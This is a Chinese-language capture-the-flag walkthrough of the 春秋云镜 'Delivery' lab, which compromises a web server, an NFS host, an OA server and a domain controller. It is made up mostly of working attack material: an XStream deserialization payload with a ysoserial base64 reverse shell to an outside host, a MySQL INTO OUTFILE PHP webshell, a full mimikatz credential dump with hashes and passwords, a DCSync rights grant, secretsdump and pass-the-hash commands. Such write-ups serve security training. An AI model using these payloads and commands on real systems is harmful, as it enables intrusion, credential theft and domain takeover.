1. 春秋云镜-Delivery
   1. flag01
   2. flag02
   3. flag03
   4. flag04

渗透

春秋云镜-Delivery

flag01

请测试 Delivery 暴露在公网上的 Web 应用的安全性，并尝试获取在该服务器上执行任意命令的能力。

fscan扫一下

fscan -h 39.99.142.217

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.142.217:80 open
39.99.142.217:22 open
39.99.142.217:21 open
39.99.142.217:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.142.217      code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[+] ftp 39.99.142.217:21:anonymous
   [->]1.txt
   [->]pom.xml
[*] WebTitle http://39.99.142.217:8080 code:200 len:3655   title:公司发货单

存在ftp匿名登录，还有一个web服务

把ftp里面的文件下下来

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>

        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>

存在xstream 1.4.16和cc依赖,根据文章进行复现

先利用yso启动一个恶意RMI服务

java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTYuMjM4LjIzMy41NS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"

再开启监听

nc -lvvp 2333

发包

POST /just_sumbit_it HTTP/1.1
Host: 39.99.142.217:8080
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml

<java.util.PriorityQueue serialization='custom'>    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>156.238.233.55</string>
                                                <int>1099</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>156.238.233.55</host>
                                        <port>1099</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

直接是root了,舒服.

cat /r*/f*/f*

flag01: flag{d372ea01-40af-460a-80c9-753780de77e0}

flag02

为了实现跨机器和跨操作系统的文件共享，管理员在内网部署了 NFS，然而这个决策却使得该服务器陷入了潜在的安全风险。你的任务是尝试获取该服务器的控制权，以评估安全性。

外网已经是root了,我们先上线vshell,然后扫一下内网

./fscan -h 172.22.13.14/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.57    is alive
(icmp) Target 172.22.13.28    is alive
[*] Icmp alive hosts len is: 4
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.6:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.6:88 open
172.22.13.14:21 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo 
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] NetInfo 
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] NetBios 172.22.13.6     [+] DC:XIAORANG\WIN-DC         
[*] WebTitle http://172.22.13.57       code:200 len:4833   title:Welcome to CentOS
[+] ftp 172.22.13.14:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle http://172.22.13.14:8080  code:200 len:3655   title:公司发货单
[*] WebTitle http://172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.13.28       code:200 len:2525   title:欢迎登录OA办公平台
[*] WebTitle http://172.22.13.28:8000  code:200 len:170    title:Nothing Here.
[+] mysql 172.22.13.28:3306:root 123456

小小总结一下

172.22.13.6 WIN-DC

172.22.13.14 外网主机

172.22.13.28 WIN-HAUWOLAO.xiaorang.lab

172.22.13.57 CentOS

提示说到了NFS服务,那我们对2049端口进行扫描

./fscan -h 172.22.13.0/24 -p 2049

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.28    is alive
(icmp) Target 172.22.13.57    is alive
[*] Icmp alive hosts len is: 4
[*] alive ports len is: 1
start vulscan
172.22.13.57:2049 open

然后查看可挂载的目录

proxychains -q showmount -e 172.22.13.57

本来想直接把joyce目录挂载到本地来,但是mount好像不走proxychains的流量,所以挂载不下来。

最后选择先ssh到外网主机,然后下载一个mount,在挂载到外网主机,写ssh公钥给joyce用户nfs-common offline installer for ubuntu 20.04.5 LTS · GitHub

run.sh

wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb

# Transfer the debs to the target machine and installed them with this order
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb

安装好后挂载到tmp目录

mount -t nfs 172.22.13.57:/home/joyce tmp

df -h 查看的确挂载成功了。

然后写公钥,ssh上去。

发现根目录放了一个域账号的密码:xiaorang.lab/zhangwen\QT62f3gBhK1

查看suid发现存在pkexec和ftp命令

直接试一下Pwnkit,失败了

然后再看看ftpftp | GTFOBins

可以利用这个文件上传,直接把flag01传上去

外网主机开启ftp服务

python3 -m pyftpdlib -p 8888 -u test -P test -w 

172.22.13.57

cd /
ftp 172.22.13.14 8888
put flag02.txt

成功上传,然后直接读取flag

flag02: flag{341e34f5-8d96-46c0-9221-3a4260487176}

flag03

请尝试获取内网中运行 OA 系统的服务器权限，并获取该服务器上的机密文件。

刚刚fscan扫出来一个数据库的弱口令,直接连上去先。

查看有无写入权限

show variables like "secure_file_priv";

为空说明有权限写入文件

查看插件目录路径

show variables like "%plugin%";

拿到C:\phpstudy_pro\

直接写webshell到C:\phpstudy_pro\www

select "<?php eval($_POST[1]);phpinfo();?>" into outfile "C:\\phpstudy_pro\\www\\shell.php";

flag03: flag{55908de1-6d6c-4743-ba6c-e2cdebf0facf}

flag04

由于域管理员错误的配置，导致域内某个用户拥有危险的 DACL。你的任务是找到该用户，并评估这个配置错误所带来的潜在危害。

webshell是system权限，直接传个mimikatz上传，拿一下哈希。

C:\Users\Administrator\flag> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords full
Authentication Id : 0 ; 87266 (00000000:000154e2)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/3/7 19:35:56
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
    msv :    
     [00000003] Primary
     * Username : chenglei
     * Domain   : XIAORANG
     * NTLM     : 0c00801c30594a1b8eaa889d237c5382
     * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
     * DPAPI    : 89b179dc738db098372c365602b7b0f4
    tspkg :    
    wdigest :    
     * Username : chenglei
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : chenglei
     * Domain   : XIAORANG.LAB
     * Password : Xt61f3LBhg1
    ssp :    
    credman :    
Authentication Id : 0 ; 87120 (00000000:00015450)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/3/7 19:35:56
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
    msv :    
     [00000003] Primary
     * Username : chenglei
     * Domain   : XIAORANG
     * NTLM     : 0c00801c30594a1b8eaa889d237c5382
     * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
     * DPAPI    : 89b179dc738db098372c365602b7b0f4
    tspkg :    
    wdigest :    
     * Username : chenglei
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : chenglei
     * Domain   : XIAORANG.LAB
     * Password : Xt61f3LBhg1
    ssp :    
    credman :    
Authentication Id : 0 ; 52745 (00000000:0000ce09)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:54
SID               : S-1-5-90-0-1
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : 442582833a4e306d5e179e7df29b091e
     * SHA1     : c1d26438993aecdb4e077fdef40f8c6ffc502285
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : e5 57 a8 39 1a 9c 48 11 78 09 f4 99 c0 48 e8 42 7f e6 ba 22 a6 5a 8b a2 6c 9d 79 ef fd 66 64 70 ad b9 fc 49 31 32 9c ae c5 ba da 34 e0 8e 32 cf b2 9a 81 d9 e8 23 ed 9c f3 a3 e5 80 82 45 df 66 3e 82 26 e7 ad 88 e0 48 40 69 22 2f 23 32 d1 59 51 d9 78 98 90 4e 07 54 35 8a bd 0b 60 46 8c fa 79 f3 7a 4c 6b 66 56 4f 45 2e bd 87 de 6c e6 59 e8 3f c5 b9 e2 96 59 db d9 a8 6c b0 82 30 ae b6 f9 ea ef 34 41 42 97 b4 64 d9 69 b0 4c 82 46 9a 14 42 7b ac d7 97 4a 4f e6 e3 10 aa 0f 73 9f e7 18 9d f7 9d c7 8a c8 a8 f0 be dd 77 d0 f0 6a 3d ac 0a 90 e6 f4 6c d4 b7 6e 8d 59 e6 aa 66 cf 3d ec f1 9d e8 f8 ff 86 01 d7 d1 fc 9b 10 56 3f ee 26 b3 8a 1a b0 cc 81 68 0a 90 fe de 5b 02 2d ee 7f 90 8f 97 fa ee 03 b6 7a b1 50 c5 fe 4c c2 1f 
    ssp :    
    credman :    
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:54
SID               : S-1-5-20
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : 442582833a4e306d5e179e7df29b091e
     * SHA1     : c1d26438993aecdb4e077fdef40f8c6ffc502285
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : win-hauwolao$
     * Domain   : XIAORANG.LAB
     * Password : e5 57 a8 39 1a 9c 48 11 78 09 f4 99 c0 48 e8 42 7f e6 ba 22 a6 5a 8b a2 6c 9d 79 ef fd 66 64 70 ad b9 fc 49 31 32 9c ae c5 ba da 34 e0 8e 32 cf b2 9a 81 d9 e8 23 ed 9c f3 a3 e5 80 82 45 df 66 3e 82 26 e7 ad 88 e0 48 40 69 22 2f 23 32 d1 59 51 d9 78 98 90 4e 07 54 35 8a bd 0b 60 46 8c fa 79 f3 7a 4c 6b 66 56 4f 45 2e bd 87 de 6c e6 59 e8 3f c5 b9 e2 96 59 db d9 a8 6c b0 82 30 ae b6 f9 ea ef 34 41 42 97 b4 64 d9 69 b0 4c 82 46 9a 14 42 7b ac d7 97 4a 4f e6 e3 10 aa 0f 73 9f e7 18 9d f7 9d c7 8a c8 a8 f0 be dd 77 d0 f0 6a 3d ac 0a 90 e6 f4 6c d4 b7 6e 8d 59 e6 aa 66 cf 3d ec f1 9d e8 f8 ff 86 01 d7 d1 fc 9b 10 56 3f ee 26 b3 8a 1a b0 cc 81 68 0a 90 fe de 5b 02 2d ee 7f 90 8f 97 fa ee 03 b6 7a b1 50 c5 fe 4c c2 1f 
    ssp :    
    credman :    
Authentication Id : 0 ; 23830 (00000000:00005d16)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:53
SID               : 
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : 442582833a4e306d5e179e7df29b091e
     * SHA1     : c1d26438993aecdb4e077fdef40f8c6ffc502285
    tspkg :    
    wdigest :    
    kerberos :    
    ssp :    
    credman :    
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:54
SID               : S-1-5-19
    msv :    
    tspkg :    
    wdigest :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :    
    credman :    
Authentication Id : 0 ; 52782 (00000000:0000ce2e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:54
SID               : S-1-5-90-0-1
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : b5cd3591a58e1169186bcdbfd4b6322d
     * SHA1     : 226ee6b5e527e5903988f08993a2456e3297ee1f
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
    ssp :    
    credman :    
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:53
SID               : S-1-5-18
    msv :    
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : win-hauwolao$
     * Domain   : XIAORANG.LAB
     * Password : e5 57 a8 39 1a 9c 48 11 78 09 f4 99 c0 48 e8 42 7f e6 ba 22 a6 5a 8b a2 6c 9d 79 ef fd 66 64 70 ad b9 fc 49 31 32 9c ae c5 ba da 34 e0 8e 32 cf b2 9a 81 d9 e8 23 ed 9c f3 a3 e5 80 82 45 df 66 3e 82 26 e7 ad 88 e0 48 40 69 22 2f 23 32 d1 59 51 d9 78 98 90 4e 07 54 35 8a bd 0b 60 46 8c fa 79 f3 7a 4c 6b 66 56 4f 45 2e bd 87 de 6c e6 59 e8 3f c5 b9 e2 96 59 db d9 a8 6c b0 82 30 ae b6 f9 ea ef 34 41 42 97 b4 64 d9 69 b0 4c 82 46 9a 14 42 7b ac d7 97 4a 4f e6 e3 10 aa 0f 73 9f e7 18 9d f7 9d c7 8a c8 a8 f0 be dd 77 d0 f0 6a 3d ac 0a 90 e6 f4 6c d4 b7 6e 8d 59 e6 aa 66 cf 3d ec f1 9d e8 f8 ff 86 01 d7 d1 fc 9b 10 56 3f ee 26 b3 8a 1a b0 cc 81 68 0a 90 fe de 5b 02 2d ee 7f 90 8f 97 fa ee 03 b6 7a b1 50 c5 fe 4c c2 1f 
    ssp :    
    credman :    
mimikatz(commandline) # exit
Bye!

发现一个用户

* Username : chenglei
* Domain   : XIAORANG
* NTLM     : 0c00801c30594a1b8eaa889d237c5382
* SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI    : 89b179dc738db098372c365602b7b0f4

* Username : chenglei
* Domain   : XIAORANG.LAB
* Password : Xt61f3LBhg1

查看chenglei用户的权限

net user chenglei /domain

是ACL Admin组内成员也就是说chenglei用户有WriteDacl权限，所以说可以像exchange那样打：我们直接给自己dsync权限，然后就可以dump到域管哈希了

加权限

proxychains -q python3 dacledit.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6

dump 哈希

proxychains -q impacket-secretsdump xiaorang.lab/chenglei:Xt61f3LBhg1@WIN-DC.xiaorang.lab -target-ip 172.22.13.6 -just-dc-ntlm -history -user-status

PTH

proxychains -q crackmapexec smb 172.22.13.6 -u administrator -H6341235defdaed66fb7b682665752c9a -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

flag04: flag{33454313-e8d4-40db-8542-41222632bb89}

参考文章

文章 - 内网打靶—春秋云镜篇(5) –Delivery - 先知社区

Delivery - 春秋云境 | h0ny’s blog